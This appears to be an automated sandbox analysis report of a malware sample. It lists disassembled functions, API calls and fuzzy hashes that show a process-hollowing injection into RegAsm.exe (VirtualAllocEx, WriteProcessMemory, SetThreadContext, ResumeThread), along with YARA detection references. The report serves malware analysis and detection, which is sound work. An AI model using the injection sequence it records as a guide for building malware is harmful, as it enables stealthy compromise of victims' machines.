                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 132 14607ec-1463c87 135 1463c9e-1463cfd WriteProcessMemory 132->135 136 1463c89-1463c9b 132->136 137 1463d06-1463d50 135->137 138 1463cff-1463d05 135->138 136->135 138->137
                                APIs
                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 01463CED
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: b2d6f9ff46c87634b142cc9bc001f4d6fc6da7fafc303b8dbe69bacbfc03b348
                                • Instruction ID: dfbf0301079e5db474787e637f5868813c33fc8bf4ce73b7c3913b426adc7d62
                                • Opcode Fuzzy Hash: b2d6f9ff46c87634b142cc9bc001f4d6fc6da7fafc303b8dbe69bacbfc03b348
                                • Instruction Fuzzy Hash: FD4198B5D002589FDB10CFAAD984AEEFBF5BB09314F24902AE818B7350D375A945CF64
                                Function 01463C10 Relevance: 1.6, APIs: 1, Instructions: 117injectionCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 142 1463c10-1463c87 144 1463c9e-1463cfd WriteProcessMemory 142->144 145 1463c89-1463c9b 142->145 146 1463d06-1463d50 144->146 147 1463cff-1463d05 144->147 145->144 147->146
                                APIs
                                • WriteProcessMemory.KERNELBASE(00000000,00000000,?,?,?), ref: 01463CED
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessWrite
                                • String ID:
                                • API String ID: 3559483778-0
                                • Opcode ID: 378719227e7e809fc9c8f94202bb50f5ce8713eb05e79c084d55cbe133f8a785
                                • Instruction ID: 0ac864f9ed5c16947579b8c1d12b13397d7cd39871868eff7b629ef21ca68ed5
                                • Opcode Fuzzy Hash: 378719227e7e809fc9c8f94202bb50f5ce8713eb05e79c084d55cbe133f8a785
                                • Instruction Fuzzy Hash: 254179B5D002589FDB10CFA9D984AEEFBF1BB49314F24902AE818B7250D375A945CF54
                                Function 01463390 Relevance: 1.6, APIs: 1, Instructions: 109COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 151 1463390-146345c ReadProcessMemory 154 1463465-14634af 151->154 155 146345e-1463464 151->155 155->154
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0146344C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 721c6365253dade045a8462f4ecb25dc28c5c2d3038bb0c99727f008a0b590cc
                                • Instruction ID: 6fb64782be1b5bedc7f5dceacb87c99089bef4f266f3af8e733ae3603fe8c61b
                                • Opcode Fuzzy Hash: 721c6365253dade045a8462f4ecb25dc28c5c2d3038bb0c99727f008a0b590cc
                                • Instruction Fuzzy Hash: 6D4189B9D052589FCB11CFA9D984ADEFBF1BB09310F14906AE818B7210D335AA46CF64
                                Function 014607BC Relevance: 1.6, APIs: 1, Instructions: 108COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 159 14607bc-146345c ReadProcessMemory 162 1463465-14634af 159->162 163 146345e-1463464 159->163 163->162
                                APIs
                                • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0146344C
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: MemoryProcessRead
                                • String ID:
                                • API String ID: 1726664587-0
                                • Opcode ID: 4dd409e034c9458a42ec9a0c3538338dcc95f7f20d0abd9412c1b68373610af0
                                • Instruction ID: c3f1c8f352af1e1433e6ce595b501efea337b334819e2427741a0bf3fe2dffc8
                                • Opcode Fuzzy Hash: 4dd409e034c9458a42ec9a0c3538338dcc95f7f20d0abd9412c1b68373610af0
                                • Instruction Fuzzy Hash: D34178B9D042589FCB10CFA9D984ADEFBF5BB09314F14902AE818B7250D375A941CF64
                                Function 01463618 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 175 1463618-1463660 177 1463668-14636dc VirtualAllocEx 175->177 178 14636e5-1463727 177->178 179 14636de-14636e4 177->179 179->178
                                APIs
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 014636CC
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: 897c80332c583e07965672eaf0931cc890cb316d967e01a7f07a2a6f688a38e2
                                • Instruction ID: 0f364a585d08631d9a49190656010b639c7049bf933499e0de25a6d12027198d
                                • Opcode Fuzzy Hash: 897c80332c583e07965672eaf0931cc890cb316d967e01a7f07a2a6f688a38e2
                                • Instruction Fuzzy Hash: 764179B9D052589FCF10CFA9D984A9EFBF5BB09310F24901AE918B7310D735A906CF64
                                Function 014607D4 Relevance: 1.6, APIs: 1, Instructions: 103memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 167 14607d4-14636dc VirtualAllocEx 170 14636e5-1463727 167->170 171 14636de-14636e4 167->171 171->170
                                APIs
                                • VirtualAllocEx.KERNELBASE(00000000,?,?,?,?), ref: 014636CC
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: AllocVirtual
                                • String ID:
                                • API String ID: 4275171209-0
                                • Opcode ID: c10541790890e1a732d8a2b47ed17d60db463a88674b2e0175005ccf649d4dfd
                                • Instruction ID: 67cae69e12f855f30a44de8267ed4545ab8296891ee7e6e6e88510181f8b5610
                                • Opcode Fuzzy Hash: c10541790890e1a732d8a2b47ed17d60db463a88674b2e0175005ccf649d4dfd
                                • Instruction Fuzzy Hash: 2A4168B9D042589FCB10CFA9D984A9EFBB5BB09310F10901AE918B7310D775A901CF64
                                Function 01460804 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 193 1460804-1463234 196 1463236-1463248 193->196 197 146324b-1463291 Wow64SetThreadContext 193->197 196->197 198 1463293-1463299 197->198 199 146329a-14632de 197->199 198->199
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 95cf9115640c83e03a828a97fc6393056eedbd7e17b5671cb195c4d254181c57
                                • Instruction ID: 812f448e1f00b4c17640bf9be22d5d3ce416b61c0c38d70459ab0b9c02f19c7c
                                • Opcode Fuzzy Hash: 95cf9115640c83e03a828a97fc6393056eedbd7e17b5671cb195c4d254181c57
                                • Instruction Fuzzy Hash: 6341AAB4D00258DFCB10CFAAD884AAEFBF4BB49314F10802AE418B7350D374A946CF65
                                Function 01460794 Relevance: 1.6, APIs: 1, Instructions: 96threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 183 1460794-1463234 186 1463236-1463248 183->186 187 146324b-1463291 Wow64SetThreadContext 183->187 186->187 188 1463293-1463299 187->188 189 146329a-14632de 187->189 188->189
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: fcd4a080d44816bd4c5fa3a7a360d46ccb58f3fe26b446bd63538e87a41f50ea
                                • Instruction ID: 48bc8b4a23cf042a255192f5393a957ccc31c70e4a2325e9a569a26da0133f7f
                                • Opcode Fuzzy Hash: fcd4a080d44816bd4c5fa3a7a360d46ccb58f3fe26b446bd63538e87a41f50ea
                                • Instruction Fuzzy Hash: E441AAB4D002589FCB10CFAAD884AEEFBF4BB49314F10802AE418B7350D374A946CF55
                                Function 014631C8 Relevance: 1.6, APIs: 1, Instructions: 95threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 203 14631c8-1463234 205 1463236-1463248 203->205 206 146324b-1463291 Wow64SetThreadContext 203->206 205->206 207 1463293-1463299 206->207 208 146329a-14632de 206->208 207->208
                                APIs
                                • Wow64SetThreadContext.KERNEL32(?,?), ref: 01463281
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ContextThreadWow64
                                • String ID:
                                • API String ID: 983334009-0
                                • Opcode ID: 2139c2036233a9c27b44b3d205d27e2f8948333075dfeb8405d458e7125b196d
                                • Instruction ID: 930f6edf945ec0662b7754ae34d7d0d545c141c90095182c1261fd14a13f516f
                                • Opcode Fuzzy Hash: 2139c2036233a9c27b44b3d205d27e2f8948333075dfeb8405d458e7125b196d
                                • Instruction Fuzzy Hash: 5C41A9B8D012589FCB14CFAAD884ADEFBF1BB49314F10802AE818B7350D778A946CF55
                                Function 014640B0 Relevance: 1.6, APIs: 1, Instructions: 75threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 212 14640b0-1464145 ResumeThread 215 1464147-146414d 212->215 216 146414e-1464188 212->216 215->216
                                APIs
                                • ResumeThread.KERNELBASE(00000000), ref: 01464135
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: 442f62f199ef5ca306774cf2d36128c95cee4fc18ba883fb943d2657cd69b2f1
                                • Instruction ID: 0c774caa23cfbbeddad7f7f181ec51c4d00eef8f858160938df6ab9b70f8f840
                                • Opcode Fuzzy Hash: 442f62f199ef5ca306774cf2d36128c95cee4fc18ba883fb943d2657cd69b2f1
                                • Instruction Fuzzy Hash: E23199B8D012589FCB10CFA9D984ADEFBF4AB49314F14905AE814B7310D735A901CFA5
                                Function 0146081C Relevance: 1.6, APIs: 1, Instructions: 74threadCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 220 146081c-1464145 ResumeThread 223 1464147-146414d 220->223 224 146414e-1464188 220->224 223->224
                                APIs
                                • ResumeThread.KERNELBASE(00000000), ref: 01464135
                                Memory Dump Source
                                • Source File: 00000002.00000002.1638970145.0000000001460000.00000040.00000800.00020000.00000000.sdmp, Offset: 01460000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_2_2_1460000_p_Cm7afCdw.jbxd
                                Similarity
                                • API ID: ResumeThread
                                • String ID:
                                • API String ID: 947044025-0
                                • Opcode ID: cb59d8827cf7c9883b8b98f25900c72877b95a12a04564c515134c751b5b4e22
                                • Instruction ID: 322968fcc9264bc958fe2defd7afc016aa40718c6695c7055eac226af4bd5b48
                                • Opcode Fuzzy Hash: cb59d8827cf7c9883b8b98f25900c72877b95a12a04564c515134c751b5b4e22
                                • Instruction Fuzzy Hash: 6F3198B8D01218DFCB14DFA9D984A9EFBF4AB09314F14902AE818B7320D775A901CFA5

                                Execution Graph

                                Execution Coverage:1.5%
                                Dynamic/Decrypted Code Coverage:4.9%
                                Signature Coverage:7.7%
                                Total number of Nodes:142
                                Total number of Limit Nodes:12
                                execution_graph 73037 42c443 73038 42c460 73037->73038 73041 2c62df0 LdrInitializeThunk 73038->73041 73039 42c488 73041->73039 73042 42ff83 73043 42ff93 73042->73043 73044 42ff99 73042->73044 73047 42efc3 73044->73047 73046 42ffbf 73050 42d153 73047->73050 73049 42efde 73049->73046 73051 42d16d 73050->73051 73052 42d17e RtlAllocateHeap 73051->73052 73052->73049 73179 4250e3 73180 4250ff 73179->73180 73181 425127 73180->73181 73182 42513b 73180->73182 73184 42ce33 NtClose 73181->73184 73183 42ce33 NtClose 73182->73183 73185 425144 73183->73185 73186 425130 73184->73186 73189 42f003 RtlAllocateHeap 73185->73189 73188 42514f 73189->73188 73190 42ffe3 73191 42eee3 RtlFreeHeap 73190->73191 73192 42fff8 73191->73192 73194 425473 73199 42548c 73194->73199 73195 42551c 73196 4254d4 73197 42eee3 RtlFreeHeap 73196->73197 73198 4254e4 73197->73198 73199->73195 73199->73196 73200 425517 73199->73200 73201 42eee3 RtlFreeHeap 73200->73201 73201->73195 73053 414243 73056 42d0b3 73053->73056 73057 42d0d0 73056->73057 73060 2c62c70 LdrInitializeThunk 73057->73060 73058 414265 73060->73058 73153 41ad13 73154 41ad2b 73153->73154 73156 41ad85 73153->73156 73154->73156 73157 41ec33 73154->73157 73159 41ec59 73157->73159 73158 41ed56 73158->73156 73159->73158 73166 430023 RtlAllocateHeap RtlFreeHeap 73159->73166 73161 41eceb 73161->73158 73162 41ed4d 73161->73162 73163 42c493 LdrInitializeThunk 73161->73163 73162->73158 73167 4290c3 73162->73167 73163->73162 73165 41ee0e 73165->73156 73166->73161 73168 429128 73167->73168 73169 429163 73168->73169 73172 419313 73168->73172 73169->73165 73171 429145 73171->73165 73173 4192b3 73172->73173 73174 42d1f3 ExitProcess 73173->73174 73175 4192fb 73174->73175 73175->73171 73202 41ba73 73203 41bab7 73202->73203 73204 41bad8 73203->73204 73205 42ce33 NtClose 73203->73205 73205->73204 73206 4147b3 73207 4147cd 73206->73207 73212 417f53 73207->73212 73209 4147eb 73210 414830 73209->73210 73211 41481f PostThreadMessageW 73209->73211 73211->73210 73213 417f5f 73212->73213 73214 417fb3 LdrLoadDll 73213->73214 73215 417f7e 73213->73215 73214->73215 73215->73209 73193 2c62b60 LdrInitializeThunk 73061 401bc9 73062 401bd0 73061->73062 73062->73062 73065 430453 73062->73065 73068 42eab3 73065->73068 73069 42ead6 73068->73069 73080 407593 73069->73080 73071 42eaec 73079 401c1c 73071->73079 73083 41b883 73071->73083 73073 42eb0b 73076 42eb20 73073->73076 73098 42d1f3 73073->73098 73094 4289d3 73076->73094 73077 42eb3a 73078 42d1f3 ExitProcess 73077->73078 73078->73079 73082 4075a0 73080->73082 73101 416c03 73080->73101 73082->73071 73084 41b8af 73083->73084 73125 41b773 73084->73125 73087 41b8f4 73089 41b910 73087->73089 73092 42ce33 NtClose 73087->73092 73088 41b8dc 73090 41b8e7 73088->73090 73131 42ce33 73088->73131 73089->73073 73090->73073 73093 41b906 73092->73093 73093->73073 73095 428a35 73094->73095 73097 428a42 73095->73097 73139 418dc3 73095->73139 73097->73077 73099 42d210 73098->73099 73100 42d221 ExitProcess 73099->73100 73100->73076 73102 416c20 73101->73102 73104 416c39 73102->73104 73105 42d883 73102->73105 73104->73082 73107 42d89d 73105->73107 73106 42d8cc 73106->73104 73107->73106 73112 42c493 73107->73112 73113 42c4ad 73112->73113 73119 2c62c0a 73113->73119 73114 42c4d9 73116 42eee3 73114->73116 73122 42d1a3 73116->73122 73118 42d945 73118->73104 73120 2c62c11 73119->73120 73121 2c62c1f LdrInitializeThunk 73119->73121 73120->73114 73121->73114 73123 42d1bd 73122->73123 73124 42d1ce RtlFreeHeap 73123->73124 73124->73118 73126 41b78d 73125->73126 73130 41b869 73125->73130 73134 42c533 73126->73134 73129 42ce33 NtClose 73129->73130 73130->73087 73130->73088 73132 42ce4d 73131->73132 73133 42ce5e NtClose 73132->73133 73133->73090 73135 42c54d 73134->73135 73138 2c635c0 LdrInitializeThunk 73135->73138 73136 41b85d 73136->73129 73138->73136 73140 418ded 73139->73140 73146 4192fb 73140->73146 73147 414423 73140->73147 73142 418f1a 73143 42eee3 RtlFreeHeap 73142->73143 73142->73146 73144 418f32 73143->73144 73145 42d1f3 ExitProcess 73144->73145 73144->73146 73145->73146 73146->73097 73148 414443 73147->73148 73151 4144ac 73148->73151 73152 41bb93 RtlFreeHeap LdrInitializeThunk 73148->73152 73150 4144a2 73150->73142 73151->73142 73152->73150 73176 419518 73177 42ce33 NtClose 73176->73177 73178 419522 73177->73178

                                Executed Functions

                                Function 00417F53 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 176 417f53-417f7c call 42fac3 180 417f82-417f90 call 4300c3 176->180 181 417f7e-417f81 176->181 184 417fa0-417fb1 call 42e583 180->184 185 417f92-417f9d call 430363 180->185 190 417fb3-417fc7 LdrLoadDll 184->190 191 417fca-417fcd 184->191 185->184 190->191
                                APIs
                                • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417FC5
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Load
                                • String ID:
                                • API String ID: 2234796835-0
                                • Opcode ID: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction ID: a878203bc698d83f05b7e2fca1152cc0e70717ccebf5934bd4b8571c1c78209f
                                • Opcode Fuzzy Hash: 3fe8b4b3c928643f2372ef665b4a9745e3ad0373b24b018f6ca483aa9f35663e
                                • Instruction Fuzzy Hash: 06011EB5E4020DABDF10DBE5DC92FDEB778AB54308F0041AAE90897240F635EB598B95
                                Function 0042CE33 Relevance: 1.5, APIs: 1, Instructions: 25nativeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 202 42ce33-42ce6c call 4048f3 call 42e073 NtClose
                                APIs
                                • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CE67
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Close
                                • String ID:
                                • API String ID: 3535843008-0
                                • Opcode ID: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction ID: 12d92c16304b53064a5c4291a4558afdafcc0bd6d98ff4256559b717f45b20f5
                                • Opcode Fuzzy Hash: 9a1499e219b01f6c9a04ddb757c9dca137445a984c770f04393579757e662d82
                                • Instruction Fuzzy Hash: C7E04F762506147BD510BA5ADC11F97775CDFC5714F004469FB0867142C675790186F4
                                Function 02C635C0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 219 2c635c0-2c635cc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 54f2a5a6cd192830bcb2626fa22f81b749441c8994adb30e12741717832aab64
                                • Instruction ID: 172ef4853532301a6c009655ef91acd72bd5d0425f9c2d60804dd30c31ce3de3
                                • Opcode Fuzzy Hash: 54f2a5a6cd192830bcb2626fa22f81b749441c8994adb30e12741717832aab64
                                • Instruction Fuzzy Hash: 8390027164550402D10071584518707100587D0611F65C521A1424568D87958A5175A2
                                Function 02C62B60 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 216 2c62b60-2c62b6c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 34fab50f9a628ee3c47a2b14adb459e7bb364e2232611fe07cfe4ae32ea1ceb5
                                • Instruction ID: 456a1e6bc5e047e5961d9168467fcd708b7532e0a98fd2de115bd78af219d491
                                • Opcode Fuzzy Hash: 34fab50f9a628ee3c47a2b14adb459e7bb364e2232611fe07cfe4ae32ea1ceb5
                                • Instruction Fuzzy Hash: 059002A124240003410571584418617400A87E0611B55C131E2014590DC52589917125
                                Function 02C62C70 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 217 2c62c70-2c62c7c LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: f178149fb8039dfd8ffab4ce1355819a45feb5990a813f14c03ec0abb9f896f2
                                • Instruction ID: 9b25a09ad866013a92a6632b2a7d40a1d172f54af48ab77fe338769dfe9202f2
                                • Opcode Fuzzy Hash: f178149fb8039dfd8ffab4ce1355819a45feb5990a813f14c03ec0abb9f896f2
                                • Instruction Fuzzy Hash: 4590027124148802D1107158840874B000587D0711F59C521A5424658D869589917121
                                Function 02C62DF0 Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMONLIBRARYCODE
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 218 2c62df0-2c62dfc LdrInitializeThunk
                                APIs
                                Memory Dump Source
                                • Source File: 00000004.00000002.1810032510.0000000002BF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BF0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_2bf0000_RegAsm.jbxd
                                Similarity
                                • API ID: InitializeThunk
                                • String ID:
                                • API String ID: 2994545307-0
                                • Opcode ID: 182a7f2543377770e3d07c69516fb17cc63502039920180c203a0f3717b447c2
                                • Instruction ID: 62218d81ca438c2aaea8fa595705cdd7e6355c759330ab125f4bb8c8615d3729
                                • Opcode Fuzzy Hash: 182a7f2543377770e3d07c69516fb17cc63502039920180c203a0f3717b447c2
                                • Instruction Fuzzy Hash: E390027124140413D11171584508707000987D0651F95C522A1424558D96568A52B121
                                Function 0041478B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 62threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                • Instruction ID: 08783e45b3445f12ea0d109643d2fe1f3c0a7b118079be54961ebfd15e186d8f
                                • Opcode Fuzzy Hash: 4bb8949d7952fd6f5e8e45d4105f9153af2bca4304bc491e0bd1dbb5af135acc
                                • Instruction Fuzzy Hash: BA01E1B2D4115C7ADB00AAD58C81DFF7B7CDF41398F81806AFA14AB141D22C8E078BA5
                                Function 004147AD Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 61threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 15 4147ad-4147c5 16 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 15->16 17 4147c8 call 42ef83 15->17 26 41483d-414843 16->26 27 41481f-41482e PostThreadMessageW 16->27 17->16 27->26 28 414830-41483a 27->28 28->26
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                • Instruction ID: 55e4c84b5d1332bfae79c458348879d2d4c42dde8b1271e511681eabfa8b2cfc
                                • Opcode Fuzzy Hash: a8befdf1139e21b3882535c43dbf738675fb9d190012064125ebd954cb9cfc20
                                • Instruction Fuzzy Hash: 0001E5B2E0115C7ADB10AAE19C81DEF7B7CDF41398F408069FA14BB241D6384E068BA4
                                Function 004147B3 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 60threadwindowCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 29 4147b3-4147c5 30 4147cd-41481d call 42f993 call 417f53 call 404863 call 4255b3 29->30 31 4147c8 call 42ef83 29->31 40 41483d-414843 30->40 41 41481f-41482e PostThreadMessageW 30->41 31->30 41->40 42 414830-41483a 41->42 42->40
                                APIs
                                • PostThreadMessageW.USER32(74w51-39,00000111,00000000,00000000), ref: 0041482A
                                Strings
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: MessagePostThread
                                • String ID: 74w51-39$74w51-39
                                • API String ID: 1836367815-2653036387
                                • Opcode ID: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                • Instruction ID: 1d3746b8afa38300bee756f3e677ba9afac3934325a235b4f4357ff197b049ae
                                • Opcode Fuzzy Hash: d8c847d9b602cc0ef889ac12f254f5617776066c6cf961dec30326a9506bf840
                                • Instruction Fuzzy Hash: DB0104B2D0015C7ADB00AAE18C81DEF7B7CDF40398F408069FA0477240D6388E068BB5
                                Function 0042D153 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 192 42d153-42d194 call 4048f3 call 42e073 RtlAllocateHeap
                                APIs
                                • RtlAllocateHeap.NTDLL(?,0041ECEB,?,?,00000000,?,0041ECEB,?,?,?), ref: 0042D18F
                                Memory Dump Source
                                • Source File: 00000004.00000002.1809321195.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_4_2_400000_RegAsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: AllocateHeap
                                • String ID:
                                • API String ID: 1279760036-0
                                • Opcode ID: 410d0e9143d4020b8a6aae258be14db686c65e6f57224d5bd35b00bbd2e1ea86
                                • Instruction ID: 79292d26c6a9dc3b6d4b7b5f52fefd6cb1c5ad5164505cdca91e487aa7c787f8
